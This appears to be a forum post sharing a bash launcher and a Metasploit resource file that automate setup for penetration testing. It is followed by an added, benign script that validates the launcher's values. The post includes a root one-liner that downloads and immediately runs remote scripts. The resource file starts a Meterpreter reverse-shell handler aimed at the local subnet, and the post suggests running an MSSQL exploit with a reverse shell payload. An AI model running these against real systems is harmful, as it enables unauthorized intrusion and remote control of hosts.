Are you tired of doing the same things over and over again in msf3, especially setting basic options?
Here is what I use for my daily msf3 usage.
Copy & paste the basic shell script below, and also the msf3.base content, and just change the paths to reflect your environment!
OR for the lazy ones...
run this in a root terminal:
Code:
mkdir -p /opt/_PRODUCTION/_LOGS/msf3 /opt/_HOMEGR0WN/bin/CONF/ && cd /opt/_HOMEGR0WN/bin && wget -q http://zerohat.de/_shared_files/start_msf3 && cd /opt/_HOMEGR0WN/bin/CONF && wget -q http://zerohat.de/_shared_files/msf3.base && export PATH=$PATH:/opt/_HOMEGR0WN/bin && start_msf3
Starting msf3 via a simple bash script; below is my start_msf3 script
(it will look for your active network interface and change basic msf3 options in a resource file called msf3.base)
Code:
#!/bin/bash
#
#base vars
#
LOG="/opt/_PRODUCTION/_LOGS/msf3"
ACTIVE_IF=$(netstat -anr |grep UG |awk -F" " '{print $8}')
IF_IP=$(ifconfig $ACTIVE_IF |grep "inet addr" |gawk -F: '{print $2}' |cut -d" " -f1)
IF_MAC=$(macchanger -s $ACTIVE_IF |gawk -F" " '{print $3}')
IP_SUBNET=$(echo $IF_IP |cut -d"." -f1-3)
#
#change necessary vars in the base msf3 resource file
#
sed -i "s/^setg LHOST.*/setg LHOST $IF_IP/g" /opt/_HOMEGR0WN/bin/CONF/msf3.base
sed -i "s/^setg RHOSTS.*/setg RHOSTS $IP_SUBNET.0\/24/g" /opt/_HOMEGR0WN/bin/CONF/msf3.base
sed -i "s/^setg SHOST.*/setg SHOST $IF_IP/g" /opt/_HOMEGR0WN/bin/CONF/msf3.base
sed -i "s/^setg SMAC.*/setg SMAC $IF_MAC/g" /opt/_HOMEGR0WN/bin/CONF/msf3.base
#msf3.base stores this option as "set INTERFACE" (not setg), so match that form
sed -i "s/^set INTERFACE.*/set INTERFACE $ACTIVE_IF/g" /opt/_HOMEGR0WN/bin/CONF/msf3.base
cd /opt/metasploit3/msf3
printf "\n\n"
read -p ">> Should we update msf3 (y/n)? _ " -e update
#quote the answer so that an empty reply does not break the test
if [ "$update" = "y" ]; then
    printf "\n...be patient, takes a moment to update..\n"
    svn update
fi
./msfconsole -r /opt/_HOMEGR0WN/bin/CONF/msf3.base
Note: SMAC is needed for auxiliary scanner/discovery/arp_sweep, if you wanna do an ARP sweep.
Here is the content of the /opt/_HOMEGR0WN/bin/CONF/msf3.base file:
(remember, our msf3-startup script will change some of these vars every time you call it)
Code:
db_driver sqlite3
db_destroy /opt/_PRODUCTION/_LOGS/msf3/msf3_base.db
db_create /opt/_PRODUCTION/_LOGS/msf3/msf3_base.db
load db_tracker
setg SessionLogging true
setg ConsoleLogging true
setg LHOST x.x.x.x
setg RHOSTS x.x.x.x/24
setg SHOST x.x.x.x
setg SMAC 00:xx:ca:20:xx:xx
set INTERFACE wlan1
setg THREADS 50
setg LPORT 445
setg OUTPUTPATH /opt/_PRODUCTION/_LOGS/msf3
use multi/handler
exploit -j -z -p windows/meterpreter/reverse_tcp
back
setg
jobs -l
Note: Logs will go into your ~/.msf3/logs directory!
Also you can add your favorite exploit to start with, like:
use exploit/windows/mssql/ms09_004_sp_replwritetovarbin
exploit -j -z -o RHOST=x.x.x.x,DisablePayloadHandler=true -p windows/shell/reverse_tcp
(we also set to disable current payload handler to use a different one for this exploit)
/have fun, brtw2003
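Added example, not part of the original post: the start script's sed rewrite of msf3.base writes whatever interface detection returned, so an empty or multi-line result (no default route, or two of them) silently corrupts the resource file. The sketch below validates the values first and rewrites the file via a temp copy; the function names and the sample addresses are assumptions, and it accepts either `set INTERFACE` or `setg INTERFACE` in the file.

```sh
#!/bin/sh
# Added example (not the original poster's script): validate detected values
# before rewriting the resource file. Function names are hypothetical.

valid_if() {   # interface name: 1-15 safe characters, no whitespace/newlines
  case $1 in ''|*[!A-Za-z0-9_.:-]*) return 1 ;; esac
  [ "${#1}" -le 15 ]
}

valid_ip() {   # dotted quad with every octet <= 255
  case $1 in *[!0-9.]*) return 1 ;; esac
  printf '%s\n' "$1" | grep -Eq '^([0-9]{1,3}\.){3}[0-9]{1,3}$' || return 1
  old_ifs=$IFS; IFS=.; set -- $1; IFS=$old_ifs
  for octet in "$@"; do [ "$octet" -le 255 ] || return 1; done
}

valid_mac() {  # six colon-separated hex bytes
  case $1 in *[!0-9A-Fa-f:]*) return 1 ;; esac
  printf '%s\n' "$1" | grep -Eq '^([0-9A-Fa-f]{2}:){5}[0-9A-Fa-f]{2}$'
}

# update_base FILE IFACE IP MAC: rewrite the setg/set lines, or change nothing
update_base() {
  file=$1; iface=$2; ip=$3; mac=$4
  [ -f "$file" ] || { echo "missing resource file: $file" >&2; return 1; }
  valid_if "$iface" || { echo "bad interface: '$iface'" >&2; return 1; }
  valid_ip "$ip" || { echo "bad IP: '$ip'" >&2; return 1; }
  valid_mac "$mac" || { echo "bad MAC: '$mac'" >&2; return 1; }
  tmp=$(mktemp "$file.XXXXXX") || return 1
  # Write to a temp file first so a failed sed never truncates the original.
  sed -E \
    -e "s|^setg LHOST.*|setg LHOST $ip|" \
    -e "s|^setg RHOSTS.*|setg RHOSTS ${ip%.*}.0/24|" \
    -e "s|^setg SHOST.*|setg SHOST $ip|" \
    -e "s|^setg SMAC.*|setg SMAC $mac|" \
    -e "s|^setg? INTERFACE.*|set INTERFACE $iface|" \
    "$file" >"$tmp" && mv "$tmp" "$file" || { rm -f "$tmp"; return 1; }
}

# Constructed demo input: a scratch copy with the post's placeholder lines.
demo=$(mktemp)
printf 'setg LHOST x.x.x.x\nset INTERFACE wlan1\n' >"$demo"
update_base "$demo" eth0 192.0.2.17 02:00:00:aa:bb:cc && cat "$demo"
rm -f "$demo"
```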